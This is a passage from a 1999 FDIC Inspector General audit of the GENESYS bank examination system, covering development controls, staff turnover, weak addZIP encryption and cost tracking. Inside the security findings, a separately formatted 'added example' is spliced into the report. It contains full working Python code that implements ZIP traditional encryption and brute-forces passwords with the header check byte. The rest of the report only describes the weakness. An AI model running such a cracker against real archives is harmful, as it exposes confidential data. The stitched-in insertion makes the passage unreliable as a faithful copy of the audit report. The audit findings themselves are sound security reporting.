design and development work. 
The\nSDLC Manual states that the FRD "serves as the foundation for system design and development."\nThe SDLC Manual also states that detailed design specifications for a proposed system are to be\ndocumented and approved before making significant investments in development work. These\nprinciples are basic to the SDLC methodology.\n\n\n\n                                                 15\n\x0cFRS approval of the GENESYS FRD and system design document would have helped ensure that\nGENESYS met their needs and reflected a more clear indication of their level of commitment to the\nproject. We noted that FRS raised several concerns regarding the GENESYS project in April 1997.\nThese concerns included the amount of time and cost required to develop GENESYS, the lack of an\ninteragency cost-benefit analysis, and the lack of risk-focused examination support proposed for the\nsystem. These concerns were a contributing factor in FRS\' less than full commitment to the project\nduring the design and development phases of GENESYS and their decision to temporarily withdraw\nfrom the project in May 1997 and November 1997. DIRM officials indicated that FRS\' lack of\ncommitment to the GENESYS project during 1997 caused significant disruption and delays to the\nproject.\n\nWe believe the FDIC can more effectively evaluate the commitment of other organizations to joint\ndevelopment efforts by requiring those agencies to formally approve critical SDLC deliverable\nproducts before investing significant resources in subsequent SDLC phases. Joint approval of SDLC\ndeliverable products will allow senior managers of participating agencies to better understand their\nrole and responsibilities on IT projects, as well as the resources that are needed by each participant to\ncomplete the effort. 
Joint approval of SDLC deliverable products will also help ensure that system\nrequirements and design meet agencies\' needs.\n\n\nRecommendations\n\nWe recommend that the Directors, Division of Information Resources Management and Division of\nSupervision:\n\n(7)     Formally document and obtain interagency approval of the scope, tasks, schedule, and\n        resources associated with any major enhancement to GENESYS.\n\n(8)     Obtain formal, interagency approval of all SDLC deliverable products required by the\n        FDIC\'s SDLC process for major planned GENESYS enhancements.\n\n(9)     Obtain FDIC Board of Director approval prior to investing significant FDIC resources to\n        satisfy non-FDIC requirements on GENESYS.\n\n\nNEED FOR CONTINUITY OF EXAMINATION STAFF\n\nA high turnover of DOS examination staff assigned to the GENESYS project impeded critical\ndevelopment activities, including requirements definition and system design, and introduced\nunnecessary delays to the project schedule. We noted that four different DOS program managers\nwere assigned to the GENESYS project during its 2 1/2-year development cycle. In addition, DOS\nexamination staff assigned to work on the GENESYS project were replaced every 120 days.\n\nThe high turnover of examiners assigned to the GENESYS project resulted in differing perspectives\non the design of the GENESYS modules and screens, resulting in changes to ongoing design and\n\n                                                  16\n\x0cdevelopment efforts. In addition, because senior DOS and DIRM management had not formally\napproved a functional requirements or system design document until after development of\nGENESYS had begun, controls over design changes made by rotating examination staff were\ndiminished. 
The inefficiencies and delays caused by the high turnover of DOS examination staff\nwere exacerbated by an equally high turnover of FRS and state examiners working on the project\nand DIRM\'s use of an evolutionary prototyping approach for development.\n\nAlthough work on an initial release of GENESYS was completed in August 1998, FDIC has already\nplanned major enhancements to the system. We believe that DOS and DIRM can achieve significant\ntime savings and efficiencies when addressing these planned GENESYS enhancements by\nappointing a permanent DOS program manager and maintaining a core staff of key personnel that\nare committed to the project until its completion.\n\nThe GENESYS developers recognized early in the project\'s life cycle that the high turnover of DOS\nexaminers was affecting the efficiency and timeliness of the GENESYS development process. The\nGENESYS project work plan states: "All efforts required to bring new team members up to speed as\nexisting team members depart and are replaced are essentially non-productive hours and will\nintroduce delays in the schedule. Project experience to date has demonstrated that as new team\nmembers are brought on, significant team time is required to familiarize them with the project, their\nroles and their assignments, and to explain why certain decisions were made; resolved issues again\nbecome topics of debate and second-guessing. Loss of continuity becomes a problem, particularly\nwhen an assigned deliverable has a long development or delivery time, e.g., training materials or\nuser manuals."\n\nWhile some staff turnover on projects with long development schedules should be expected, sound\nbusiness practices suggest that a program manager and a core group of program team members be\nmaintained throughout a project\'s development life cycle. 
Project Management for Mission Critical\nSystems, a handbook developed by the Information Technology Resources Board (ITRB) in October\n1997,1 stresses the importance of keeping the core development team members together. The\nhandbook recommends that management maintain a commitment to the integrity of key project\nplayers, including program office officials, from project conception through implementation. Senior\nDIRM and DOA management identified a high turnover of project staff as a contributing factor in\nthe FDIC\'s recent decision to terminate another major corporate automation effort, TAPS. In\naddition, GAO has cited frequent turnover of project managers and other key development personnel\nas a common cause of system failures in the federal government.\n\nThe inefficiencies and delays caused by the high turnover of DOS examination staff were\nexacerbated by an equally high turnover of FRS and state examiners assigned to the project. We\nnoted that FRS had assigned three different project managers to the GENESYS project and that\nCSBS had assigned four different project managers to the GENESYS project during 1997 and 1998.\nWe also noted that FRS and CSBS examination staff turned over about every 30 to 90 days. In\n\n1\n ITRB was created in July 1996 pursuant to Executive Order 13011. ITRB performs peer reviews of major systems\ninitiatives in the federal government and publicizes the resulting lessons learned and promising practices. ITRB consists\nof IT, acquisition, and program professionals with significant experience in developing, acquiring, and managing\ninformation systems in the federal government.\n                                                           17\n\x0caddition, DIRM\'s decision to use an evolutionary prototyping approach for GENESYS development\nmade the project more sensitive to personnel turnover. 
DIRM\'s evolutionary prototyping approach\ninvolved extensive developer/user interaction to build requirements and design specifications into a\nworking software prototype. Developers placed less emphasis on maintaining up-to-date\nrequirements and design documentation than prescribed by the FDIC\'s SDLC process. As a result,\nas examiners left the GENESYS project, so did much of the knowledge and rationale underlying\nwhy decisions relating to GENESYS requirements and design were made.\n\nThe DOS program manager for GENESYS informed us that some steps had been taken in late\n1997 and 1998 to mitigate the impact of examiner turnover. For example, DOS examination\nstaff improved GENESYS user documentation. However, the DOS program manager also\nindicated that in addition to the personal and professional disruption of being away from their\nduty station for an extended period, there were financial disadvantages for examiners on detail\nfor more than 120 days.\n\nWe believe that DOS management should explore alternatives to detailing key examination staff\nto the GENESYS project for short periods of time. In our opinion, a core group of DOS staff\nshould be assigned to development projects and planned enhancements to GENESYS from\ninitiation through implementation. We recognize that the FDIC cannot direct the staff\nassignments of other organizations. However, the FDIC can significantly reduce its exposure to\ncost and schedule overruns on future systems development projects and planned enhancements to\nGENESYS by ensuring greater continuity of its assigned staff. 
The continuity associated with\nreduced examiner turnover should allow the FDIC to more efficiently address its role as the lead\nbanking agency for the maintenance and development of the planned enhancements to\nGENESYS.\n\n\nRecommendations\n\nWe recommend that the Director, Division of Supervision:\n\n(10)   Evaluate the feasibility of establishing a permanent staff to manage the development,\n       operation, and maintenance of major DOS systems including GENESYS.\n\n(11)   Ensure that a core group of staff is assigned to future systems development or enhancement\n       projects until the project is completed.\n\n\nIMPROVED SAFEGUARDS NEEDED TO PROTECT CONFIDENTIAL\nBANK EXAMINATION DATA\n\nGENESYS security features that were designed to prevent the unauthorized disclosure of\nconfidential bank examination information need to be improved. Specifically, GENESYS uses a\ncompression program called addZIP Compression Libraries (addZIP) to encrypt confidential bank\nexamination data processed by GENESYS. However, addZIP does not encrypt sensitive files that\n\n                                                18\n\x0care created and permanently stored on the laptop\'s hard drive each time users utilize the print\nfunction in GENESYS. When a user prints information in GENESYS, such as a report of\nexamination page, GENESYS creates a copy of the printed information and stores it in plain text on\nthe laptop\'s hard drive. Because printed information is stored outside of GENESYS, it is neither\nencrypted nor protected by the application\'s login ID and password.\n\nIn addition, a file containing GENESYS login IDs and passwords is saved to the laptop\'s hard drive\nin plain text whenever a user fails to exit the application properly. 
Examples of when a user would\nfail to exit the application properly include power disruptions, software errors requiring users to\nreboot the laptop, or users simply turning the laptop power off without first exiting GENESYS.\nAlthough the examiner laptops have power-on passwords that are intended to restrict access to any\ninformation contained on the laptop, these passwords can be circumvented by simply removing the\nlaptop\'s battery.\n\nAdditionally, DIRM has not demonstrated that addZIP complies with Federal Information\nProcessing Standards (FIPS) or broader industry standards governing the effective protection of\nsensitive data. We identified several Internet sites containing detailed descriptions of software\nprograms capable of cracking addZIP\'s encryption algorithm. We obtained one such readily\navailable freeware attack program from the Internet and successfully ran it against the GENESYS\ndatabase. We were able to crack addZIP\'s encryption algorithm, obtain the passwords used to\nprotect the database, and view confidential bank examination data. We noted that the passwords\nused by addZIP to protect the GENESYS database and data did not meet the corporate standards\ndescribed in FDIC Circular 1360.10, Corporate Password Standards, including minimum length of\npasswords or use of alpha and numeric characters. We concluded that addZIP is not a reliable means\nof protecting sensitive data.\n\nDIRM and DOS defined the information security requirements for GENESYS in the FRD and\nsystem design document. The FRD states: "GENESYS will contain volumes of institution specific\nfinancial information including detailed listings of the institution\'s loan customers. There will be\nseveral subjective comments concerning management and the institution\'s loan customers. 
This\ninformation is highly confidential\xe2\x80\xa6" The FRD identifies several security features that DIRM\nplanned to implement to significantly reduce the likelihood of unauthorized access to GENESYS\ndata, including the encryption of the application\'s database and the use of passwords to restrict access\nto the application. The FRD also states that GENESYS information security should comply with\nFIPS and the law.\n\nDOS derived its information security requirements for GENESYS, in part, from Part 309 of FDIC\'s\nRules and Regulations, which strictly prohibit the public disclosure of any information contained in a\nreport of examination. FRS, as well as individual state banking regulators who will be using\nGENESYS, have similar legal restrictions over the public disclosure of bank examination findings\nand ratings. In addition, federal statutes protect the confidentiality of information pertaining to\nindividual loan customers.\n\nDIRM initially planned to ensure the confidentiality of sensitive GENESYS data using\ncryptographic security products developed by Entrust Technologies, Inc. Entrust Technologies\n\n                                                  19\n\x0chas implemented in Entrust a cryptographic module which has been validated by the National\nInstitute of Standards and Technology (NIST) and meets the Level 1 requirements of the\nstandard. In addition, the GENESYS project work plan states that Entrust had been selected by\nFDIC as a corporate standard for data protection, encryption, and session security support.\nHowever, reservations expressed by FRS about the complexity of implementing and maintaining\nEntrust and emphasis on meeting the GENESYS development schedule delayed implementation\nof Entrust with GENESYS.\n\nIn May 1998, we learned that DIRM and DOS had proceeded with a live pilot implementation of\nGENESYS in four banks without any data encryption. 
We immediately discussed the FDIC\'s\nplans regarding the security of GENESYS data with DIRM and DOS officials and, in June 1998,\nDIRM decided to encrypt GENESYS data using addZIP. We were informed that addZIP would\nserve as an interim solution to GENESYS\' encryption requirements until a permanent solution\ncould be identified.\n\nWe researched and tested the data encryption capabilities of addZIP and identified several\nlimitations:\n\n\xe2\x80\xa2     The GENESYS FRD states that one of the GENESYS security requirements is to comply with\n      FIPS and the law. However, DIRM has not demonstrated that addZIP complies with NIST FIPS\n      or broader industry standards governing the effective protection of sensitive data.\n\n\xe2\x80\xa2     There are several readily available software attack programs on the Internet capable of cracking\n      addZIP\'s encryption algorithm. We successfully ran one such attack program against the\n      GENESYS database and were able to crack addZIP\'s encryption algorithm and obtain the\n      passwords used to protect the GENESYS database.\n\n\xe2\x80\xa2     Passwords used by addZIP to protect the GENESYS database did not meet the corporate\n      standards described in FDIC Circular 1360.10, Corporate Password Standards, or broader\n      industry standards, regarding length of passwords or use of alpha and numeric characters.\n\n\xe2\x80\xa2     AddZIP is compatible with PKzip[2], a widely used data compression program on personal\n      computers. Data files compressed and encrypted using addZIP can also be decompressed and\n      decrypted using PKzip. As a result, data could be read by unauthorized individuals with access\n      to examiner laptop computers.\n\n\xe2\x80\xa2     Although a password can be used to protect data that is encrypted by addZIP, the password is not\n      "hashed" (i.e., passed through a one-way function, normally together with a random salt, so that\n      the encryption key cannot be derived directly from the password and the password cannot be\n      recovered from the key). Hashing passwords before they are used as keys is a basic tenet of\n      modern encryption.\n\n[2] PKzip is a registered trademark of PKWARE, Inc.\n\nSecurity weaknesses, such as those discussed above, are typically detected and corrected during an\napplication\'s SQT. The FDIC\'s SDLC Manual states that the purpose of a SQT is to validate that\nfunctional requirements, including security, are satisfied by the developed system and that there are\nno adverse effects on the overall process or other existing systems. However, as discussed in an\nearlier section of this report, a formal SQT was not performed for GENESYS, despite concerns\nexpressed by our office to senior DIRM and DOS management in May 1998. We advised the DIRM\nand DOS project managers for GENESYS of our findings regarding the limitations of GENESYS\nsecurity on September 10, 1998, so that they could take appropriate actions in as timely a manner as\npossible. At the close of our field work, DIRM was researching the possibility of replacing addZIP\nwith Entrust.\n\nApplying new technologies to the bank examination process offers examiners significant advantages\nover traditional manual examination techniques. For example, GENESYS will improve the amount\nand timeliness of bank examination data available to examiners during examinations. Data query\nand analysis tools contained within GENESYS will also offer examiners a number of advantages\nover traditional manual examination techniques. However, advanced technology also presents new\nand potentially more serious security threats, such as the unauthorized disclosure of confidential\nbank examination information or the undetected alteration of sensitive data reported by or relating to\na bank. Protecting sensitive bank examination information is an important element of public trust\nand confidence in bank supervision and regulation. 
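The addZIP limitations listed above (a key derived directly from an unhashed password, passwords too short to meet Circular 1360.10, and a file format that any PKzip-compatible tool can read) can be demonstrated concretely. The Python program below is an added example prepared for this edition of the report; it is not code from the audit, from addZIP, or from PKWARE. It assumes, on the strength of the report's statement that PKzip can decrypt addZIP output, that addZIP used the traditional PKWARE ("ZipCrypto") stream cipher published in PKWARE's APPNOTE. It implements that cipher, encrypts a constructed examination record under a constructed four-digit numeric password, and then recovers the password the way the publicly available attack programs do: the 12-byte encryption header ends in a check byte (the high byte of the plaintext CRC-32, which the archive directory stores in clear), so roughly 255 of every 256 wrong guesses are rejected after decrypting only 12 bytes. The record, the password and the header bytes are constructed for the demonstration. Note that the same attack tools also exploit a known-plaintext weakness of this cipher (Biham and Kocher, 1994) that recovers the internal keys regardless of password length; a longer password would therefore narrow, but not close, the exposure.

```python
"""Traditional PKWARE ("ZipCrypto") encryption and a check-byte assisted
password search.  Added example; not code from the audit report, addZIP or
PKWARE.  Assumption: addZIP's PKzip-compatible encryption is this cipher
(the report states that PKzip could decrypt addZIP output)."""
import os
import zlib
from typing import Optional


def _make_crc_table():
    """CRC-32 lookup table, reflected polynomial 0xEDB88320, as PKZIP uses it."""
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


CRC_TABLE = _make_crc_table()


def _crc32_update(crc: int, byte: int) -> int:
    return CRC_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """The PKWARE APPNOTE stream cipher.  The three 32-bit keys are derived
    directly from the password bytes: no salt, no iteration count and no
    one-way hash, which is the 'not hashed' finding in the report."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update_keys(b)

    def _update_keys(self, b: int) -> None:
        self.k0 = _crc32_update(self.k0, b)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_update(self.k2, self.k1 >> 24)

    def _keystream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update_keys(p)  # key schedule advances on the plaintext byte
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update_keys(p)
            out.append(p)
        return bytes(out)


def entry_crc(plaintext: bytes) -> int:
    """The CRC-32 a ZIP directory stores in clear for each member."""
    return zlib.crc32(plaintext)


def encrypt_entry(plaintext: bytes, password: bytes,
                  header11: Optional[bytes] = None) -> bytes:
    """Encrypt one archive member as PKZIP does: 11 random header bytes plus
    one check byte (high byte of the plaintext CRC-32), then the data."""
    if header11 is None:
        header11 = os.urandom(11)
    check = bytes([entry_crc(plaintext) >> 24])
    return ZipCrypto(password).encrypt(header11 + check + plaintext)


def crack(ciphertext: bytes, stored_crc: int, candidates):
    """Try candidate passwords.  The check byte rejects ~255/256 wrong guesses
    after 12 decrypted bytes; survivors are confirmed against the stored CRC.
    Returns (password, plaintext, candidates_tried, check_byte_survivors)
    or None if no candidate matches."""
    check = stored_crc >> 24
    tried = survivors = 0
    for pw in candidates:
        tried += 1
        cipher = ZipCrypto(pw)
        if cipher.decrypt(ciphertext[:12])[11] != check:
            continue
        survivors += 1
        plain = cipher.decrypt(ciphertext[12:])  # cipher state carries on
        if entry_crc(plain) == stored_crc:
            return pw, plain, tried, survivors
    return None


def numeric_passwords(digits: int):
    """Every password of exactly `digits` decimal digits (10,000 for 4)."""
    for n in range(10 ** digits):
        yield f"{n:0{digits}d}".encode()


# Constructed sample data: a fictitious record and a password that
# Circular 1360.10 would reject (short, digits only).
RECORD = b"Bank: Example National Bank | Composite rating: 3 | Capital: 2\n"
WEAK_PASSWORD = b"1998"


def demo(header11: Optional[bytes] = None):
    blob = encrypt_entry(RECORD, WEAK_PASSWORD, header11)
    result = crack(blob, entry_crc(RECORD), numeric_passwords(4))
    if result is not None:
        pw, plain, tried, survivors = result
        print(f"recovered {pw!r} after {tried} guesses "
              f"({survivors} passed the check byte)")
        print(plain.decode())
    return result


if __name__ == "__main__":
    demo()
```

Running the script recovers the four-digit password in a fraction of a second on any workstation; the survivor count shows how few candidates ever need the full decryption. The corporate standard's requirement for longer, mixed alphanumeric passwords raises the cost of this particular search, but because the keys are derived from the password with no salt or hash and the cipher has a known-plaintext weakness, a password policy alone does not make this format suitable for confidential examination data.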
While the measures taken to protect sensitive\ndata should be commensurate with the security levels of the data being protected, we believe that\nimproved safeguards are needed to ensure that confidential GENESYS data is adequately protected\nfrom unauthorized disclosure or alteration.\n\n\nRecommendations\n\nWe recommend that the Director, Division of Information Resources Management:\n\n(12)   Incorporate security features into GENESYS that will adequately address the security\n       requirements contained in the functional requirements document and that will provide\n       reasonable assurance that confidential bank examination information will be adequately\n       protected against unauthorized disclosure or alteration.\n\n(13)   Direct DIRM\'s Information Security Section to perform a security review of GENESYS to\n       ensure compliance with corporate security standards and guidelines and to ensure that the\n       application has adequate security.\n\n\nTRACKING AND REPORTING OF GENESYS COST-BENEFIT INFORMATION CAN\nBE IMPROVED\n\nGenerally, DIRM and DOS needed to maintain more complete and up-to-date cost-benefit\ninformation on GENESYS throughout its life cycle. Although DIRM had an established process for\ntracking and reporting its expenditures on GENESYS, the process did not track or report significant\nprogram office costs incurred by DOS examiners and others assigned to the project. DIRM\'s process\nalso did not track or report full life cycle (i.e., inception to date) costs for GENESYS. Program\noffice and life cycle cost information are basic tenets of any successful IT investment decision\nmaking process.\n\nIn addition, we observed that GENESYS cost-benefit information had not been continually\nevaluated throughout the life cycle of GENESYS as material changes occurred from earlier\nprojections. 
Tracking program office and life cycle costs on GENESYS enhancements will provide\nmanagement with more accurate and complete IT cost data with which to measure performance and\nmake critical investment decisions. Improved project information will also allow managers to better\nmeasure project performance by comparing cost data to original projections.\n\nDIRM implemented the DIRM Budget Support System (DBSS) in 1997 to track the division\'s\nexpenditures and commitments against approved budgets for each of its IT projects. DBSS tracked\nDIRM\'s expenditures and commitments on IT activities by allocating DIRM expenses, such as\nemployee salaries, travel, and contractor billings, to specific IT projects. DIRM maintained this\ninformation in a centralized Lotus Notes[3] database. Periodic cost reports identifying budgets and\nrelated expenditures for selected IT projects were provided to the FDIC\'s IT Technical Committee\nand IT project managers for their consideration in making management decisions. Additional, high\nlevel cost-benefit information was developed for GENESYS as part of DIRM\'s annual planning and\nbudgeting for new and ongoing IT projects and provided to the FDIC\'s IT Technical Committee.\n\nWhile DBSS provided management with valuable financial information about GENESYS, the\nsystem did not account for significant DOS personnel and travel costs incurred on the project. The\nDOS program manager for GENESYS indicated that examiners began recording their hours spent on\nGENESYS in the Scheduling Hours and Reporting Package (SHARP) in January 1998. SHARP is a\ncomputerized hours tracking system used by DOS examiners to allocate their time spent on specific\ntasks. 
However, DIRM and DOS project personnel were not tracking or comparing DOS costs to\nprojected cost estimates.\n\nAlthough DOS personnel and travel costs were not being tracked or reported, the DIRM and DOS\nproject managers for GENESYS indicated that significant DOS resources were being expended on\nthe project. For example, the GENESYS project work plan, approved August 28, 1997, estimated\nthat DOS would expend approximately $2.6 million in personnel resources on the project during the\nperiod of June 1, 1997 through December 31, 1998. We noted that the $2.6 million figure did not\ninclude DOS travel expenses or significant DOS personnel resources expended on the project prior\nto June 1, 1997.\n\nOMB Circulars No. A-109, Major Systems Acquisitions, and No. A-11, Planning, Budgeting, and\nAcquisition of Capital Assets, require federal agencies to monitor the full life cycle costs of their IT\ninvestments, including all costs incurred to bring the investment to a form and location suitable for\nits intended use. For example, program office costs should be tracked as life cycle costs and\ncompared to estimates and cost-benefit analyses throughout a project\xe2\x80\x99s life cycle. Sound business\npractices also dictate that significant costs associated with system development projects be tracked\nand reported to management.\n\n[3] Lotus Notes is a registered trademark of Lotus Development Corporation.\n\nDIRM also did not track life cycle (i.e., inception to date) costs for GENESYS. We noted that\nDBSS contained only current year cost data and that the system was used primarily to ensure that\nDIRM\'s annual budget for GENESYS was not exceeded. The DIRM project manager for\nGENESYS indicated that, while not readily available, full life cycle cost data could be reconstructed\nfor GENESYS by researching the project files. 
However, any reconstructed life cycle data would\nnot be complete because program office costs were not being maintained. Further, unless full life\ncycle cost data is tracked, analyzed, and reported, it cannot benefit the FDIC\'s management decision\nmaking process.\n\nWe concluded that, as of the close of our field work, DIRM and DOS system development staff had\nnot provided senior FDIC management with a full life cycle cost estimate for GENESYS that was\nreviewed and approved. The GENESYS project work plan, which was approved by senior DIRM\nand DOS management on August 28, 1997, estimated the cost to design, develop, and implement\nGENESYS to be approximately $7.4 million. This same estimate was also provided to the FDIC\'s\nBoard of Directors in a formal request for expenditure authority dated July 15, 1997. However, the\n$7.4 million estimate significantly underestimated the total life cycle cost to the FDIC for developing\nand implementing GENESYS. Specifically, the $7.4 million figure did not include several million\ndollars[4] in DIRM and DOS personnel, contractor, travel, hardware, software and other costs incurred\non the project from December 1995, when the project was initiated, through May 31, 1997. The\n$7.4 million estimate also did not include approximately $2.9 million in software support,\nmaintenance, and enhancement costs that DIRM estimated would be incurred on the project during\nthe period 1999 through 2002.\n\nThe DIRM project manager for GENESYS indicated that DOS program office and life cycle cost\ndata were not being tracked or reported for GENESYS because the FDIC had no requirement to do\nso and because management had not requested this information. OMB Circulars No. A-11,\nPlanning, Budgeting, and Acquisition of Capital Assets, and A-109, Major System Acquisitions,\nrequire federal agencies to monitor the full life cycle costs of their IT investments. 
Without periodic\ncomparisons of original estimates and cost-benefit analyses to actual results, agencies cannot\ndetermine whether their IT investments will deliver promised benefits within cost and risk\nlimitations. Government oversight agencies, such as OMB and GAO, have also stressed the need for\ncurrent, accurate, and complete cost information on which to base IT investment decisions in\npublications, such as GAO\xe2\x80\x99s February 1997 guide, Assessing Risks and Returns: A Guide for\nEvaluating Federal Agencies\xe2\x80\x99 IT Investment Decision-making.\n\n[4] We were unable to quantify the exact amount of expenditures incurred by DIRM and DOS on the GENESYS project\nbetween December 1995 and May 31, 1997 because IT expenditures were not tracked and reported during this entire\nperiod. We estimated the total costs incurred by DIRM and DOS during this period using DIRM estimates and actual\ncosts, where available.\n\nIn an OIG report, Audit of FDIC Resource and Cost Tracking Systems for Information Systems\nProjects, dated March 6, 1998, we recommended that DIRM and DOF work with representatives of\nthe FDIC\'s business units to develop a capability to track and report total costs associated with IT\nprojects, including program office costs. We also recommended that DIRM begin tracking and\nreporting full life cycle costs on IT projects. In addition, we recommended that DIRM develop\npolicies and procedures that would require IT project managers to routinely review actual life cycle\ninformation on project costs to date, expected benefits, estimated timelines for implementation, and\nrisks and to compare that information with the information that was relied upon by senior\nmanagement at the outset of the project. 
Because DIRM and DOF management agreed to\nimplement actions that were responsive to our recommendations, we are making no\nrecommendations in this report at this time.\n\n\nCORPORATION COMMENTS AND OIG EVALUATION\n\nOn March 15, 1999, the Directors, DIRM and DOS, provided a written response to the draft\nreport. The response is presented in Appendix I of this report. A summary of management\'s\nresponses to the recommendations contained in this report follows.\n\nThe Director, DIRM, stated that DIRM recognizes the problems in the project management\nprocess. As stated in its previous response to the OIG\'s report entitled Audit of the Time and\nAttendance Processing System Development Project (II), dated February 22, 1999, DIRM has\nstrengthened existing processes and established new mechanisms to address this overall problem.\nSpecifically, the Director, DIRM, stated that DIRM had developed more complete and robust IT\nplans for all projects, implemented internal controls designed to ensure that developers adhere to\nrequired SDLC procedures, established new management reporting, and implemented a post\nimplementation review program for new systems. DIRM has also established procedures to\nensure that significant changes in major projects are brought to the IT Technical Committee for\nreview and approval. In addition, DIRM implemented new procedures for conducting cost-\nbenefit analyses (CBA) which will be formally published with the next release of the SDLC\nManual, currently scheduled to be completed by April 30, 1999.\n\nFor recommendations 1-3, the Director, DIRM, stated that a formal CBA format and a $3 million\nthreshold for performing CBAs exists for DIRM projects, but that these procedures were not in\nplace when GENESYS was initiated. Subsequent to management\'s written response to our\nreport, the Director, DIRM, and the IT Technical Committee decided to eliminate the $3 million\nCBA threshold. 
Beginning March 24, 1999, a specific dollar threshold will no longer be used for\ndetermining whether a CBA is required for IT projects. The IT Technical Committee planned to\nreview all 1999 IT development projects to determine which projects require a CBA by March\n30, 1999.\n\nIn addition, the Director, DIRM, will issue a memorandum to all DIRM project managers by\nMarch 31, 1999 re-emphasizing the new CBA guidelines. The DIRM memorandum will remind\nDIRM project managers to alert senior management to significant changes in cost-benefit\ninformation, timelines, or increased risk. The DIRM memorandum will also communicate new\npolicy requiring project managers to formally revisit alternative solutions when significant scope,\ncost, risk, or schedule changes occur on IT projects. The Director, DIRM, stated, that significant\ncost deviations will be defined as over-runs of 20 percent or more and significant schedule slips\nas deviations of more than 60 days. However, subsequent to management\'s written response to\nour report, the IT Technical Committee decided to review any IT project that has been flagged\nwith variances in DIRM\'s IT Plan Database. After reviewing these projects, the IT Technical\nCommittee will request briefings from the DIRM project manager and client sponsor on projects\nconsidered significant. If the impact of the variance warrants, the IT Technical Committee will\nrecommend IT Council review. Procedures for performing, updating, and maintaining CBAs\nwill be formally published in the next release of FDIC\'s SDLC Manual.\n\nFor recommendations 4-6, the Director, DIRM, will issue a memorandum to all DIRM project\nmanagers by March 31, 1999 re-emphasizing existing requirements that prerequisite SDLC phases\nbe substantially completed and approved before proceeding with subsequent phases. This\nrequirement will be highlighted in the upcoming SDLC revision. 
The referenced memorandum will\nalso remind project managers to adhere to the phased testing approach prescribed by FDIC\'s SDLC\nManual for all future systems development projects and enhancements. In addition, DIRM will\nmake an assessment as to whether deviations from FDIC\'s SDLC process, similar to the evolutionary\nprototyping methodology used to develop GENESYS, may benefit FDIC\'s small, non-complex\nsystems initiatives that involve short development schedules. An initial assessment of evolutionary\nprototyping will be completed by June 30, 1999, with a schedule for updating FDIC\'s SDLC Manual\nto be developed no later than July 30, 1999.\n\nFor recommendations 7-9, the Directors, DIRM and DOS, stated that an interagency steering\ncommittee had been established to oversee the development and enhancement of interagency bank\nexamination tools, including GENESYS. The steering committee will formally approve all SDLC\ndeliverable products required for any major GENESYS enhancement, including an interagency\nproject work plan describing life cycle scope, tasks, schedule and resource estimates. In addition,\nDIRM and DOS will explicitly identify and present any significant resources for non-FDIC\nGENESYS requirements to the FDIC Board of Directors as part of the annual budget process. Any\nsignificant resources required for non-FDIC GENESYS requirements that were not approved as part\nof the annual budget process will also be presented to the FDIC Board of Directors for approval.\n\nFor recommendations 10 and 11, the Director, DOS, stated that a permanent Examination Specialist\nposition had been created to manage DOS\' bank examination software development, including\nGENESYS, and that 3 field examiners had been appointed for one-year detail assignments.\n\nFor recommendations 12 and 13, the Director, DIRM, stated that discussions were ongoing with\nrepresentatives from the FRS and CSBS to identify a security solution for GENESYS. 
Once\nidentified, the solution will be incorporated into the system with the implementation of GENESYS\nversion 1.2, currently scheduled for release in the fourth quarter of 1999. In addition, DIRM has\nappointed an Information Security Section staff member to the project team who will be responsible\nfor conducting appropriate reviews and other actions to ensure that GENESYS version 1.2 is in full\ncompliance with corporate security standards.\n\nThe Corporation\'s response to the draft report provides the elements necessary for management\ndecisions on each of the report\'s recommendations. Accordingly, no further response to this report is\nrequired. However, we are providing additional comments below regarding management\'s response\nto recommendations 3, 4, 5 and 9. Appendix II presents management\'s proposed actions\non our recommendations and shows that there are management decisions for each recommendation\nin this report.\n\nWe state in Recommendation 3 that the Director, DIRM, revise the FDIC\'s SDLC Manual to require\nthat as significant changes occur in a project\'s scope, risk, estimated resources, or timeframes, that\nthese changes be approved by the IT Council. The OIG made a similar recommendation in a\nrecently issued report entitled Audit of the Time and Attendance Processing System Development\nProject II, dated February 22, 1999. 
In its response to the TAPS report, recommendation 3 of this\nreport, and subsequent correspondence, DIRM indicated that significant scope, cost, risk, and\nschedule changes would be presented to the IT Technical Committee for approval and that the IT\nTechnical Committee would report significant issues to the IT Council.\n\nOn March 10, 1999, representatives of our office met with members of the IT Technical Committee\nand advised them that, in our opinion, the charters of the IT Technical Committee and IT Council\nplace authority for approval of IT projects and related changes with the IT Council. In response to\nour discussion, the IT Technical Committee decided to review its charter and recommend\nmodifications to the IT Council that would delegate responsibility for project review to the IT\nTechnical Committee. As we indicated in the referenced March 10, 1999 meeting, we believe that\nresponsibilities for reviewing and approving IT projects should remain with the IT Council.\n\nIn response to recommendations 4 and 5, the Director, DIRM, stated that DIRM project managers\nmay continue to propose different development methodologies than the phased approach prescribed\nby FDIC\'s SDLC Manual when justified by business needs and circumstances. The Director, DIRM,\nadded that proposals to utilize significantly different approaches to phased development will be\nconsidered on a case-by-case basis and approved or denied in writing by senior DIRM management\nafter a review of the probable risks and benefits of the proposed approach. As stated in the body of\nthis report, we believe that FDIC\'s large, complex systems initiatives, such as GENESYS, should\nfollow the phased development methodology prescribed by FDIC\xe2\x80\x99s SDLC process. In addition, we\nbelieve that prototyping techniques should be strictly limited to the requirements gathering phase of\nIT projects as prescribed by the FDIC\'s SDLC Manual. 
